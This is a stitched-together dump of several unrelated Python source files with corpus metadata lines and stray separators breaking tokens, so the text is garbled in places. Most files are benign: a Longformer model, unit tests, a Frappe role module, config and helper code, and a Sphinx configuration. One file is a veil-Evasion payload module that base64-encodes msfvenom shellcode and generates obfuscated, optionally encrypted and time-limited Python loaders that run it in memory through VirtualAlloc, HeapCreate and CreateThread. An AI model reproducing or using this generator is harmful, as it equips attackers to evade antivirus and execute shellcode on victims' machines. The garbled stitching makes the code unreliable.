def apply(self,
inputs,
vocab_size,
sliding_window_size=512,
global_mask=None,
causal_mask=False,
inputs_positions=None,
inputs_segmentation=None,
shared_embedding=None,
use_bfloat16=False,
emb_dim=512,
num_heads=8,
dtype=jnp.float32,
num_layers=6,
qkv_dim=512,
mlp_dim=2048,
max_len=512,
train=True,
dropout_rate=0.1,
attention_dropout_rate=0.1,
learn_pos_emb=False,
classifier=False,
classifier_pool='CLS',
num_classes=10):
"""Applies Longformer model on the inputs.
Args:
inputs: input data.
vocab_size: size of the vocabulary.
sliding_window_size: size of sliding window attention to use.
global_mask: boolean matrix of shape `[bs, seq_len]`, where `True`
indicates that the position is globally attended. By default, no global
attention is used.
causal_mask: If true, apply cau | sal attention masking.
inputs_positions: input subsequence positions for packed examples.
inputs_segmentation: input segmentation info for packed examples.
shared_embedding: a shared em | bedding layer to use.
use_bfloat16: bool: whether use bfloat16.
emb_dim: dimension of embedding
num_heads: number of heads
dtype: the dtype of the computation (default: float32)
num_layers: number of layers
qkv_dim: dimension of the query/key/value
mlp_dim: dimension of the mlp on top of attention block
max_len: maximum length.
train: if it is training,
dropout_rate: dropout rate
attention_dropout_rate: dropout rate for attention weights
learn_pos_emb: boolean, if learn the positional embedding or use the
sinusoidal positional embedding.
classifier: boolean, for classification mode (output N-class logits)
classifier_pool: str, supports "MEAN", "MAX" pooling.
num_classes: int, number of classification classes.
Returns:
output of the encoder or logits if classifier_mode is true.
"""
assert inputs.ndim == 2 # (batch, len)
# Padding Masks
src_padding_mask = (inputs > 0)[..., None]
# Input Embedding
if shared_embedding is None:
input_embed = nn.Embed.partial(
num_embeddings=vocab_size,
features=emb_dim,
embedding_init=nn.initializers.normal(stddev=1.0))
else:
input_embed = shared_embedding
x = inputs.astype('int32')
x = input_embed(x)
if classifier and classifier_pool == 'CLS':
cls = self.param('cls', (1, 1, emb_dim), nn.initializers.zeros)
cls = jnp.tile(cls, [x.shape[0], 1, 1])
x = jnp.concatenate([cls, x], axis=1)
max_len += 1
src_padding_mask = jnp.concatenate(
[src_padding_mask[:, :1], src_padding_mask], axis=1)
pe_init = nn.initializers.normal(stddev=0.02) if learn_pos_emb else None
x = common_layers.AddPositionEmbs(
x,
inputs_positions=inputs_positions,
posemb_init=pe_init,
max_len=max_len,
name='posembed_input')
x = nn.dropout(x, rate=dropout_rate, deterministic=not train)
if use_bfloat16:
x = x.astype(jnp.bfloat16)
dtype = jnp.bfloat16
else:
dtype = jnp.float32
# Input Encoder
for lyr in range(num_layers):
x = LongformerBlock(
x,
qkv_dim=qkv_dim,
mlp_dim=mlp_dim,
num_heads=num_heads,
sliding_window_size=sliding_window_size,
global_mask=global_mask,
causal_mask=causal_mask,
dtype=dtype,
inputs_segmentation=inputs_segmentation,
padding_mask=src_padding_mask,
dropout_rate=dropout_rate,
attention_dropout_rate=attention_dropout_rate,
deterministic=not train,
name=f'encoderblock_{lyr}')
encoded = nn.LayerNorm(x, dtype=dtype, name='encoder_norm')
if classifier:
encoded = common_layers.classifier_head(
encoded, num_classes, mlp_dim, pooling_mode=classifier_pool)
return encoded
class LongformerDualEncoder(nn.Module):
"""Longformer Model for Matching (dual encoding) tasks."""
def apply(self,
inputs1,
inputs2,
vocab_size=None,
inputs1_positions=None,
inputs2_positions=None,
inputs1_segmentation=None,
inputs2_segmentation=None,
use_bfloat16=False,
emb_dim=512,
num_heads=8,
num_layers=6,
qkv_dim=512,
mlp_dim=2048,
max_len=2048,
train=False,
dropout_rate=0.1,
attention_dropout_rate=0.1,
classifier=True,
classifier_pool='CLS',
num_classes=2,
interaction |
ravenac95/testkit | tests/test_context.py | Python | mit | 2,056 | 0.002432 | from testkit.context import *
def test_context_user():
from contextlib import contextmanager
test_dict = dict(value='before')
@contextmanager
def test_context(test_dict):
test_dict['value'] = 'during'
yield 'test'
test_dict['value'] = 'after'
ctx = ContextUser(test_context(test_dict))
assert test_dict['value'] == 'before'
ctx.enter()
assert test_dict['value'] == 'during'
ctx.exit()
assert test_dict['value'] == 'after'
class my_context(ContextDecorator):
def before(self):
self.hello = 'hello'
self.done = False
| def after(self):
self.done = True
def test_context_decorator_as_decorator():
as_decorator = my_context()
@as_decorator
def hello(context):
assert context.hello == 'hello'
hello()
assert as_decorator.done == True
def test_context_decorator_as_decorator_exception():
as_decorator = my_context()
fake_message = 'A fake error!'
@as_decorator
| def hello(context):
raise Exception(fake_message)
try:
hello()
except Exception, e:
assert e.message == fake_message
assert as_decorator.done == True
def test_context_decorator_as_context():
as_context = my_context()
with as_context as context:
assert context.hello == 'hello'
assert context.done == False
assert context.done == True
def test_context_decorator_as_context_exception():
as_context = my_context()
fake_message = 'error!'
try:
with as_context as context:
raise Exception(fake_message)
except Exception, e:
assert e.message == fake_message
assert context.done == True
class my_other_context(ContextDecorator):
def before(self):
self.hello = 'hello'
self.done = False
return self.hello
def after(self):
self.done = True
def test_context_decorator_before_returns_custom_context():
as_context = my_other_context()
with as_context as hello:
assert hello == 'hello'
|
gvalkov/git-link | tests/test_gitweb.py | Python | bsd-3-clause | 2,301 | 0.00565 | #!/usr/bin/env python
# encoding: utf-8
from util import *
res = [
# commit
('90f02cb510335a5bfdb57f0c78915d5ac236013c',
'http://git.naquadah.org/?p=oocairo.git;a=commitdiff;h=90f02cb510335a5bfdb57f0c78915d5ac236013c'),
# tree
('90f02cb510335a5bfdb57f0c78915d5ac236013c^{tree}',
'http://git.naquadah.org/?p=oocairo.git;a=tree;h=7d0f2011b9aa9343cf3ae6675416ddcbfddab7e9'),
# branch
('master',
'http://git.naquadah.org/?p=oocairo.git;a=shortlog;h=master'),
# tag by name
('v1.4',
'http://git.naquadah.org/?p=oocairo.git;a=commit;h=v1.4'),
# tab by sha
('f8e35c47ddb48dfeffb1f80cf523ba3207b31aa1',
'http://git.naquadah.org/?p=oocairo.git;a=commit;h=v1.3'),
# file path (HEAD)
('test/context.lua',
'http://git.naquadah.org/?p=oocairo.git;a=blob;h=472061f27b61d2bcba7a7dc75743a0e8db1a4e4c;f=test/context.lua'),
# dir path (HEAD)
('test/',
'http://git.naquadah.org/?p=oocairo.git;a=tree;f=test;h=8e941a88c606930750c98fc10927b17f0588cc8d'),
# blob with tag
('v1.4:Changes',
'http://git.naquadah.org/?p=oocairo.git;a=blob;h=5a2f18eac98afb6a601369f5fa867cd0d386b266;f=Changes'),
# blob with commit
('47bf539:COPYRIGHT',
'http://git.naquadah.org/?p=oocairo.git;a=blob;h=f90b1e3f8284f6a94f36919219acc575d9362e10;f=COPYRIGHT'),
# raw blob with commit
('-r 47bf539:COPYRIGHT',
'http://git.naquadah.org/?p=oocairo.git;a=blob_plain;h=f90b1e3f8284f6a94f36919219acc575d9362e10;f=COPYRIGHT'),
# raw blob with commit (short)
('-s 7 -r 47bf539:COPYRIGHT',
'http://git.naquadah.org/?p=oocairo.git;a=blob_plain;h=f90b1e3;f=COPYRIGHT'),
]
url = 'http://git.naquadah.org/git/oocairo.git'
linkurl = 'http://git.naquadah.org/?p=oocairo.git'
headrev = '2b40c79192e3c86074d21af51774971e19cb | d2ab'
@p | ytest.fixture
def gitlink(request):
return mk_gitlink(url, 'gitweb', 'gitweb', linkurl, headrev)
@mark.parametrize(('cmdargs', 'expect'), res)
def test_gitweb_auto_lib(gitlink, cmdargs, expect):
assert gitlink[0](cmdargs) == expect
assert validate_url_404(expect)
@skipif_no_gitlink
@mark.parametrize(('cmdargs', 'expect'), res)
def test_gitweb_auto_exe(gitlink, cmdargs, expect):
assert gitlink[1](cmdargs) == expect
assert validate_url_404(expect)
|
saurabh6790/frappe | frappe/core/doctype/role/role.py | Python | mit | 2,874 | 0.02366 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document impo | rt Document
desk_properties = ("search_bar", "notifications", "chat", "list_sidebar",
"bulk_actions", "view_switcher", "form_sidebar", "timeline", "dashboard")
class Role(Document):
def before_rename(self, old, new, merge=False):
if old in ("Guest", "Administrator", "System Manager", "All"):
frappe.throw(frappe._("Standard roles cannot be renamed"))
def after_insert(self):
frappe.cache().hdel('roles', 'Administrator')
def validate(self):
if self. | disabled:
self.disable_role()
else:
self.set_desk_properties()
def disable_role(self):
if self.name in ("Guest", "Administrator", "System Manager", "All"):
frappe.throw(frappe._("Standard roles cannot be disabled"))
else:
self.remove_roles()
def set_desk_properties(self):
# set if desk_access is not allowed, unset all desk properties
if self.name == 'Guest':
self.desk_access = 0
if not self.desk_access:
for key in desk_properties:
self.set(key, 0)
def remove_roles(self):
frappe.db.sql("delete from `tabHas Role` where role = %s", self.name)
frappe.clear_cache()
def on_update(self):
'''update system user desk access if this has changed in this update'''
if frappe.flags.in_install: return
if self.has_value_changed('desk_access'):
for user_name in get_users(self.name):
user = frappe.get_doc('User', user_name)
user_type = user.user_type
user.set_system_user()
if user_type != user.user_type:
user.save()
def get_info_based_on_role(role, field='email'):
''' Get information of all users that have been assigned this role '''
users = frappe.get_list("Has Role", filters={"role": role, "parenttype": "User"},
fields=["parent as user_name"])
return get_user_info(users, field)
def get_user_info(users, field='email'):
''' Fetch details about users for the specified field '''
info_list = []
for user in users:
user_info, enabled = frappe.db.get_value("User", user.get("user_name"), [field, "enabled"])
if enabled and user_info not in ["admin@example.com", "guest@example.com"]:
info_list.append(user_info)
return info_list
def get_users(role):
return [d.parent for d in frappe.get_all("Has Role", filters={"role": role, "parenttype": "User"},
fields=["parent"])]
# searches for active employees
@frappe.whitelist()
@frappe.validate_and_sanitize_search_inputs
def role_query(doctype, txt, searchfield, start, page_len, filters):
report_filters = [['Role', 'name', 'like', '%{}%'.format(txt)], ['Role', 'is_custom', '=', 0]]
if filters and isinstance(filters, list):
report_filters.extend(filters)
return frappe.get_all('Role', limit_start=start, limit_page_length=page_len,
filters=report_filters, as_list=1) |
ciappi/Yaranullin | yaranullin/config.py | Python | isc | 2,801 | 0.000357 | # yaranullin/config.py
#
# Copyright (c) 2012 Marco Scopesi <marco.scopesi@gmail.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION O | F CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Global configuration."""
import os
import sys
import ConfigParser
import platf | orm
# Global information
__version__ = '0.5.0'
__platform__ = platform.system()
# Check home folder
if 'HOME' not in os.environ:
if __platform__ == 'Windows':
HOME_DIR = os.path.join(os.environ['HOMEDRIVE'],
os.environ['HOMEPATH'])
else:
sys.exit('Cannot find home folder')
else:
HOME_DIR = os.environ['HOME']
if __platform__ == 'Windows':
YR_DIR = os.path.join(HOME_DIR, 'yaranullin')
else:
YR_DIR = os.path.join(HOME_DIR, '.yaranullin')
# Define resources and saves folders.
YR_FONT_DIR = os.path.join(YR_DIR, 'fonts')
YR_CACHE_DIR = os.path.join(YR_DIR, 'cache')
YR_SAVE_DIR = os.path.join(YR_DIR, 'saves')
for folder in (YR_FONT_DIR, YR_CACHE_DIR, YR_SAVE_DIR):
try:
os.makedirs(folder)
except OSError:
pass
# Installed config file.
MAIN_CONFIG_FILE = os.path.join(sys.prefix, 'share', 'yaranullin',
'yaranullin.ini')
# If there is no installed config file, we assume to be in the source folder.
if not os.path.exists(MAIN_CONFIG_FILE):
MAIN_CONFIG_FILE = os.path.join(os.path.split(
os.path.dirname(__file__))[0], 'data', 'yaranullin.ini')
# Create a global configuration object and use args to update configuration
CONFIG = ConfigParser.RawConfigParser(allow_no_value=True)
# Try to load main config file, exit on fail
try:
CONFIG.readfp(open(MAIN_CONFIG_FILE))
except IOError as why:
if why.errno == 2:
sys.exit("Unable to find main configuration file")
raise
except ConfigParser.Error:
sys.exit('Unable to parse main configuration file')
# User provided config file
USER_CONFIG_FILE = os.path.join(YR_DIR, 'yaranullin.ini')
# Update CONFIG
CONFIG.read(USER_CONFIG_FILE)
# Log files
LOG_FILE_CLIENT = os.path.join(YR_DIR, 'client.log')
LOG_FILE_SERVER = os.path.join(YR_DIR, 'server.log')
LOG_FILE_EDITOR = os.path.join(YR_DIR, 'editor.log')
|
g0tmi1k/veil-Evasion | modules/payloads/python/shellcode_inject/base64_substitution.py | Python | gpl-3.0 | 16,041 | 0.00374 | """
This payload receives the msfvenom shellcode, base64 encodes it, and stores it within the payload.
At runtime, the executable decodes the shellcode and executes it in memory.
module by @christruncer
"""
import base64
from datetime import date
from datetime import timedelta
from modules.common import shellcode
from modules.common import helpers
from modules.common import encryption
class Payload:
def __init__(self):
# required options
self.description = "Base64 encoded shellcode is decoded at runtime and executed in memory"
self.language = "python"
self.extension = "py"
self.rating = "Excellent"
self.shellcode = shellcode.Shellcode()
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"],
"INJECT_METHOD" : ["Virtual", "Virtual, Void, Heap"],
"EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days (\"X\" disables feature)"]
}
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Gener | ate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
| RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
Payl |
fabianvaccaro/pygums | pythonLibs/mahotas-1.1.0/mahotas/internal.py | Python | gpl-2.0 | 5,299 | 0.003963 | # Copyright (C) 2011-2012, Luis Pedro Coelho <luis@luispedro.org>
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
#
# License: MIT (see COPYING file)
import numpy as np
def _get_output(array, out, fname, dtype=None, output=None):
'''
output = _get_output(array, out, fname, dtype=None, output=None)
Implements the mahotas output convention:
(1) if `out` is None, return np.empty(array.shape, array.dtype)
(2) else verify that output is of right size, shape, and contiguous
Parameters
----------
array : ndarray
out : ndarray or None
fname : str
Function name. Used in error messages
Returns
-------
output : ndarray
'''
detail = '.\nWhen an output argument is used, the checking is very strict as this is a performance feature.'
if dtype is None:
dtype = array.dtype
if output is not None:
import warnings
warnings.warn('Using deprecated `output` argument in function `%s`. Please use `out` in the future. It has exactly the same meaning and it matches what numpy uses.' % fname, DeprecationWarning)
if out is not None:
warnings.warn('Using both `out` and `output` in function `%s`.\nMahotas is going to ignore the `output` argument and use the `out` version exclusively.' % fname)
else:
out = output
if out is None:
return np.empty(array.shape, dtype)
if out.dtype != dtype:
raise ValueError(
'mahotas.%s: `out` has wrong type (out.dtype is %s; expected %s)%s' %
(fname, out.dtype, dtype, detail))
if out.shape != array.shape:
raise ValueError('mahotas.%s: `out` has wrong shape (got %s, while expecting %s)%s' % (fname, out.shape, array.shape, detail))
if not out.flags.contiguous:
raise ValueError('mahotas.%s: `out` is not c-array%s' % (fname,detail))
return out
def _get_axis(array, axis, fname):
'''
axis = _get_axis(array, axis, fname)
Checks that ``axis`` is a valid axis of ``array`` and normalises it.
Parameters
----------
array : ndarray
axis : int
fname : str
Function name. Used in error messages
Returns
-------
axis : int
The positive index of the axis to use
'''
if axis < 0:
axis += len(array.shape)
if not (0 <= axis < len(array.shape)):
raise ValueError('mahotas.%s: `axis` is out of bounds (maximum was %s, got %s)' % (fname, array.ndim, axis))
return axis
def _normalize_sequence(array, value, fname):
'''
values = _normalize_sequence(array, value, fname)
If `value` is a sequence, checks that it has an element for each dimension
of `array`. Otherwise, returns a sequence that repeats `value` once for
each dimension of array.
Parameters
----------
array : ndarray
value : sequence or scalar
fname : str
Function name. Used in error messages
Returns
-------
values : sequence
'''
try:
value = list(value)
except TypeError:
return [value for s in array.shape]
if len(value) != array.ndim:
raise ValueError('mahotas.%s: argument is sequence, but has wrong size (%s for an array of %s dimensions)' % (fname, len(value), array.ndim))
return value
def _verify_is_floatingpoint_type(A, function_name):
'''
_verify_is_integer_type(array, "function")
Checks that ``A`` is a floating-point array. If it is not, it raises
``TypeError``.
Parameters
----------
A : ndarray
function_name : str
Used for error messages
'''
if not np.issubdtype(A.dtype, np.float):
raise TypeError('mahotas.%s: This function only accepts floating-point types (passed array of type %s)' % (function_name, A.dtype))
def _verify_is_integer_type(A, function_name):
'''
_verify_is_integer_type(array, "function")
Checks that ``A`` is an integer array. If it is not, it raises
``TypeError``.
Parameters
----------
A : ndarray
function_name : str
Used for error messages
'''
int_types=[
np.bool,
np.uint8,
np.int8,
np.uint16,
np.int16,
np.uint32,
np.int32,
np.int64,
np.uint64,
| ]
if A.dtype not in int_typ | es:
raise TypeError('mahotas.%s: This function only accepts integer types (passed array of type %s)' % (function_name, A.dtype))
def _make_binary(array):
'''
bin = _make_binary(array)
Returns (possibly a copy) of array as a boolean array
'''
array = np.asanyarray(array)
if array.dtype != bool:
return (array != 0)
return array
def _as_floating_point_array(array):
'''
array = _as_floating_point_array(array)
Returns (possibly a copy) of array as a floating-point array
'''
array = np.asanyarray(array)
if not np.issubdtype(array.dtype, np.float_):
return array.astype(np.double)
return array
def _check_3(arr, funcname):
if arr.ndim != 3 or arr.shape[2] != 3:
raise ValueError('mahotas.%s: this function expects an array of shape (h, w, 3), received an array of shape %s.' % (funcname, arr.shape))
|
abhi-bit/memcache-queue | benchmark.py | Python | mit | 1,075 | 0.008372 | from memqueue import MemQueue
import sys, time
import memcache
from optparse import OptionParser
client = ['127.0.0.1:11211']
queue = M | emQueue('benchmark', memcache.Client(client))
start = time.time()
if __name__ == '__main__':
parser = OptionParser(usage="usage: %prog [options] filename",
version="%prog 0.1")
parser.add_option("-a", "--add", dest="add", | default='notAdd', help="add keys to queue")
parser.add_option("-r", "--read", dest="read", default='notRead', help="read from queue")
parser.add_option("-c", "--count", dest="count", default='1000', type='int', help="no. of keys to read/add")
(options, args) = parser.parse_args()
add = options.add
read = options.read
count = options.count
if add != 'notAdd':
for index in xrange(count):
queue.add('data %s' % index)
print ('Added %d keys' % count)
if read != 'notRead':
for index in xrange(count):
queue.get()
print ('Read %s keys' % count)
print ('Time elapsed: %s seconds' % (time.time() - start))
|
socialdevices/manager | profiler/management/commands/plotprofilingstats.py | Python | bsd-3-clause | 1,441 | 0.004858 | from django.core.management.base import NoArgsCommand, CommandError
from profiler.db import ProfilerDatabase
from profiler.plotter import StatsPlotter
import time
class Command(NoArgsCommand):
help = 'Creates graphs based on profiling statistics.'
can_import_settings = True
def handle_noargs(self, **options):
db = ProfilerDatabase()
profiler_group_runs = db.get_profiler_group_runs()
prompt_str = 'Which profiler run do you want to plot?\n'
for index, profiler_group__run in enumerate(profiler_group_runs):
prompt_str += '(%i) %s - (started: %s)\n' % (index, profiler_group__run['name'], profiler_group__run['started'])
prompt_str += '\nType your choice: '
profiler_group_run_index = int(raw_input(prompt_str))
profi | ler_group_run = profiler_group_runs[profiler_group_run_index]
try:
| start_time = time.time()
dir_name = '%s_%s' % (profiler_group_run['name'], profiler_group_run['started'])
plotter = StatsPlotter()
plotter.plot(profiler_group_run['id'], dir_name)
except KeyboardInterrupt:
plotter.stop()
self.stdout.write('\nPlotting stopped.\n')
except Exception, e:
raise CommandError(e)
else:
elapsed = time.time() - start_time
self.stdout.write('Plotting finished in %i seconds\n' % elapsed) |
egabancho/invenio-communities | docs/conf.py | Python | gpl-2.0 | 10,685 | 0.005335 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
from __future__ import print_function
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('_ext'))
import ultramock
ultramock.activate()
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Invenio Communities'
copyright = u'2015, CERN'
author = u'CERN'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# Get the version string. Cannot be done with import!
g = {}
with open(os.path.join('..', 'invenio_communities', 'version.py'), 'rt') as fp:
exec(fp.read(), g)
version = g['__version__']
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are | ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ---------------------------- | ------------------
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
# only set the theme when we are not on RTD
if not on_rtd:
try:
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
except ImportError:
print("`sphinx_rtd_theme` not found, pip install it", file=sys.stderr)
html_theme = 'alabaster'
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
